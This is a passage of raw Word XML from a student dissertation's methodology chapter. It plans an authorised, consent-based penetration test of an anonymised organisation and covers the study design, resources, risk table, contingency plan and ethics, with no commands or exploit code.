          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[52]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615F235B" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="0060608D" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="177" w:name="_Toc104297054"/>
      <w:bookmarkStart w:id="178" w:name="_Toc104297731"/>
      <w:bookmarkStart w:id="179" w:name="_Toc113190724"/>
      <w:r w:rsidRPr="0060608D">
        <w:t>3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="0060608D">
        <w:tab/>
        <w:t>Time Horizon</w:t>
      </w:r>
      <w:bookmarkEnd w:id="179"/>
    </w:p>
    <w:p w14:paraId="19DC3DA4" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="180" w:name="_Toc104297057"/>
      <w:bookmarkStart w:id="181" w:name="_Toc104297733"/>
      <w:bookmarkStart w:id="182" w:name="_Toc113190725"/>
      <w:r>
        <w:t>3.4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Longitudinal Studies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="180"/>
      <w:bookmarkEnd w:id="181"/>
      <w:bookmarkEnd w:id="182"/>
    </w:p>
    <w:p w14:paraId="31357F6A" w14:textId="08575C8B" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="008D0D24">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Longitudinal studies are correlational studies that observe the same variables repeated over extended time periods, some of which can last years or decades </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1972590987"/>
          <w:placeholder>
            <w:docPart w:val="3E30850FF7494E1BA617BD213F21BEA3"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[53]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C65E03E" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="183" w:name="_Toc104297058"/>
      <w:bookmarkStart w:id="184" w:name="_Toc104297734"/>
      <w:bookmarkStart w:id="185" w:name="_Toc113190726"/>
      <w:r>
        <w:t>3.4.2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Cross-Sectional Studies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="183"/>
      <w:bookmarkEnd w:id="184"/>
      <w:bookmarkEnd w:id="185"/>
    </w:p>
    <w:p w14:paraId="1B58A974" w14:textId="22B08951" w:rsidR="00DF42B8" w:rsidRDefault="21523073" w:rsidP="008D0D24">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This type of study looks at data from a specific </w:t>
      </w:r>
      <w:bookmarkStart w:id="186" w:name="_Int_wJgFl5sC"/>
      <w:r>
        <w:t>period of time</w:t>
      </w:r>
      <w:bookmarkEnd w:id="186"/>
      <w:r>
        <w:t xml:space="preserve">, a snapshot of the current situation. As there is limited time for this project to be completed, this methodology will be used </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-798383224"/>
          <w:placeholder>
            <w:docPart w:val="B1606384D4D54B2E9BA3699B5781FEE6"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[53]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="33699597" w14:textId="1790E7DA" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="187" w:name="_Toc113190727"/>
      <w:r>
        <w:t>3.4.3</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A5686D">
        <w:t>Project Planner</w:t>
      </w:r>
      <w:bookmarkEnd w:id="187"/>
    </w:p>
    <w:p w14:paraId="749CA283" w14:textId="2ED3A348" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="008D0D24">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now that the cross-sectional type of study has been chosen, an estimation of individual task times can be considered. </w:t>
      </w:r>
      <w:r w:rsidR="00A5686D">
        <w:t>A project planner can be</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> effective in </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>keeping the project within the time constraints</w:t>
      </w:r>
      <w:r w:rsidR="00A5686D">
        <w:t xml:space="preserve"> and the one for this project can be found in Appendix </w:t>
      </w:r>
      <w:r w:rsidR="002A43D0">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A5686D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38136191" w14:textId="72454B85" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="188" w:name="_Toc113190728"/>
      <w:r>
        <w:t>3.5</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Research Methodology</w:t>
      </w:r>
      <w:bookmarkEnd w:id="177"/>
      <w:bookmarkEnd w:id="178"/>
      <w:bookmarkEnd w:id="188"/>
    </w:p>
    <w:p w14:paraId="5A92D9C1" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>It is fundamental to the project that relevant research be conducted using books, and peer reviewed journals, or other reliable sources eg. Science Direct or IEEE. The literature review is a vital component to ascertain the current research being conducted within the field which will place this work within the context of a larger picture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB8B866" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="189" w:name="_Toc104297735"/>
      <w:bookmarkStart w:id="190" w:name="_Toc104297055"/>
      <w:bookmarkStart w:id="191" w:name="_Toc113190729"/>
      <w:r>
        <w:t>3.6</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Resources and Planning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189"/>
      <w:bookmarkEnd w:id="191"/>
    </w:p>
    <w:p w14:paraId="1F87017D" w14:textId="2A59C915" w:rsidR="00DF42B8" w:rsidRDefault="21523073" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>To conduct the experiment a computer has been loaned from the University and a virtual machine running Kali Linux has been installed. Kali-Linux has many pre-installed tools that can be used to run the experiment. Other open-source tools are also available should they be required. FortiClient VPN has also been installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1950E97C" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="192" w:name="_Toc104297736"/>
      <w:bookmarkStart w:id="193" w:name="_Toc113190730"/>
      <w:r>
        <w:t>3.7</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Design</w:t>
      </w:r>
      <w:bookmarkEnd w:id="192"/>
      <w:bookmarkEnd w:id="193"/>
    </w:p>
    <w:p w14:paraId="501A020D" w14:textId="250A298B" w:rsidR="00DF42B8" w:rsidRDefault="21523073" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once the Rules of Engagement have been finalised </w:t>
      </w:r>
      <w:r w:rsidR="00A02515">
        <w:t>with Or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ganisation </w:t>
      </w:r>
      <w:r w:rsidR="00A02515">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r>
        <w:t>giving written consent and the scope of the test, Kali Linux operating system (OS) will be set up on VMware and a VPN will be created using FortiClient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CD9BEB" w14:textId="06ABF412" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reconnaissance will look at the network and scan for CVEs. These vulnerabilities will be researched, and a plan of attack created. The </w:t>
      </w:r>
      <w:r w:rsidR="002A1896">
        <w:t>exploits</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will be implemented, and the analysis of the results will determine the success of the project aim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE34F21" w14:textId="166ECBF7" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A report will be generated and forwarded to </w:t>
      </w:r>
      <w:r w:rsidR="00A02515">
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t>rganisation</w:t>
      </w:r>
      <w:r w:rsidR="00A02515">
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5F66C7" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="194" w:name="_Toc104297737"/>
      <w:bookmarkStart w:id="195" w:name="_Toc113190731"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.8</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Data Collection and Analysis Methods</w:t>
      </w:r>
      <w:bookmarkEnd w:id="190"/>
      <w:bookmarkEnd w:id="194"/>
      <w:bookmarkEnd w:id="195"/>
    </w:p>
    <w:p w14:paraId="0FF6A634" w14:textId="2022283C" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There are many different types of strategies for researchers to choose from for data collection. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="198595415"/>
          <w:placeholder>
            <w:docPart w:val="6EE7B9725F55459BB751C023024BB54F"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[52]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>uggests that the type of data collected is dictated by the research proposal question.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> In this case most of the data collection will be primary data ie. original data collected for the sole purpose of answering the research question and for replicable experiments to be conducted. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0452DE6E" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="00E713DD" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>The primary data will be analysed against secondary data from the literature review to measure the similarities or differences in the outcome of the experiments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2BC4A6" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="196" w:name="_Toc104297059"/>
      <w:bookmarkStart w:id="197" w:name="_Toc104297738"/>
      <w:bookmarkStart w:id="198" w:name="_Toc113190732"/>
      <w:r>
        <w:t>3.9</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Risk Assessment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="196"/>
      <w:bookmarkEnd w:id="197"/>
      <w:bookmarkEnd w:id="198"/>
    </w:p>
    <w:p w14:paraId="7C241853" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>A risk assessment is required to ensure a successful project. There are numerous factors that could impact this project and they have been put into a table (table 1) together with the requisite mitigating factors.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9067" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4106"/>
        <w:gridCol w:w="4961"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DF42B8" w14:paraId="76D0E021" w14:textId="77777777" w:rsidTr="00F573E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4106" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FC62A75" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="00AE5903" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="851"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE5903">
              <w:t>isk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4057792F" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="00AE5903" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="851"/>
              </w:tabs>
            </w:pPr>
            <w:r w:rsidRPr="00AE5903">
              <w:t>Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF42B8" w14:paraId="781F2DDE" w14:textId="77777777" w:rsidTr="00F573E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4106" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46334CF2" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="851"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Time constraint for experimentation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="391BBC9A" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="851"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Ensure the goals are achievable and realistic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF42B8" w14:paraId="14367429" w14:textId="77777777" w:rsidTr="00F573E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4106" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F2F9A41" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="851"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Software that is unavailable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="403D8C26" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="851"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Have contingency software that could perform the same function.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF42B8" w14:paraId="0BFD7BB0" w14:textId="77777777" w:rsidTr="00F573E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4106" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08130105" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="851"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Loss of data or data corruption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C1AD22A" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="851"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ensure that there are copies of the data stored in separate locations within the cloud. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="167ECE08" w14:textId="1DF86D96" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="199" w:name="_Toc111363896"/>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Risks and Mitigation Techniques</w:t>
      </w:r>
      <w:bookmarkEnd w:id="199"/>
    </w:p>
    <w:p w14:paraId="19B2BA23" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="00461B46" w:rsidRDefault="00DF42B8" w:rsidP="00F573E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789B9126" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="200" w:name="_Toc104297061"/>
      <w:bookmarkStart w:id="201" w:name="_Toc104297740"/>
      <w:bookmarkStart w:id="202" w:name="_Toc113190733"/>
      <w:r>
        <w:t>3.10</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Contingency Plan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202"/>
    </w:p>
    <w:p w14:paraId="031C671A" w14:textId="49E95EB0" w:rsidR="00DF42B8" w:rsidRPr="00461B46" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The project is currently subject to </w:t>
      </w:r>
      <w:r w:rsidR="00A02515">
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rganisation </w:t>
      </w:r>
      <w:r w:rsidR="00A02515">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">accepting a penetration test on their system. It is within their right to stop this from happening at any time. Should this be the case, then the vulnerability scan exposing known CVEs set up prior to the start of </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">this project will be used and these CVEs will be set up on virtual machines and used as a simulation of what would have happened had </w:t>
      </w:r>
      <w:r w:rsidR="00A02515">
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rganisation </w:t>
      </w:r>
      <w:r w:rsidR="00A02515">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r>
        <w:t>continued with their authorisation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AC1381" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="00E46032" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="203" w:name="_Toc113190734"/>
      <w:r>
        <w:t>3.11</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ethical Reflections</w:t>
      </w:r>
      <w:bookmarkEnd w:id="200"/>
      <w:bookmarkEnd w:id="201"/>
      <w:bookmarkEnd w:id="203"/>
    </w:p>
    <w:p w14:paraId="2B752B83" w14:textId="46BD6826" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When writing this project, the utmost discretion will be used to keep any information pertaining to the organisation anonymous. Encryption and passwords per document will be standard. The use of reliable platforms together with </w:t>
      </w:r>
      <w:r w:rsidR="00F573E9">
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>ulti-</w:t>
      </w:r>
      <w:r w:rsidR="00F573E9">
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">actor </w:t>
      </w:r>
      <w:r w:rsidR="00F573E9">
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uthentication to store data will provide more security. Only anonymised results will be produced and revealed for this project. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4912FD82" w14:textId="0681BDF6" w:rsidR="00DF42B8" w:rsidRPr="00504903" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r w:rsidR="00171190">
        <w:t xml:space="preserve">approved </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ethics form has been completed </w:t>
      </w:r>
      <w:r w:rsidR="00761CF1">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A02515">
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r w:rsidR="002A43D0">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00761CF1">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A02515">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7894318D" w14:textId="115AF649" w:rsidR="00DF42B8" w:rsidRPr="00E46032" w:rsidRDefault="0067301D" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="204" w:name="_Toc113190735"/>
      <w:r>
        <w:t>Research Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204"/>
    </w:p>
    <w:p w14:paraId="683DD971" w14:textId="01A0FDC4" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>This chapter highlighted the research methods required to successfully complete the project. The structured plan outlines the research approach as quantitative with a postpositivist paradigm and a cross-sectional time horizon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CBC18F" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>It established the need for up-to-date research using reliable sources such as peer reviewed journals. A risk assessment was undertaken, and mitigation techniques were examined, and a contingency plan was put in place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECD47F1" w14:textId="3A614190" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A timeline was explored using a </w:t>
      </w:r>
      <w:r w:rsidR="00A5686D">
        <w:t>project planner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and ethical considerations were investigated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344DBCD9" w14:textId="18340135" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Finally, this chapter outlined the resources and design together with how data is to be collected, stored, and analysed. The following chapter will further develop the project design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59306D15" w14:textId="77777777" w:rsidR="00761CF1" w:rsidRDefault="00761CF1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA7657A" w14:textId="290FAB6E" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="205" w:name="_Toc113190736"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CHAPTER 4: DESIGN AND IMPLEMENTATION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205"/>
    </w:p>
    <w:p w14:paraId="576A83E3" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="206" w:name="_Toc113190737"/>
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
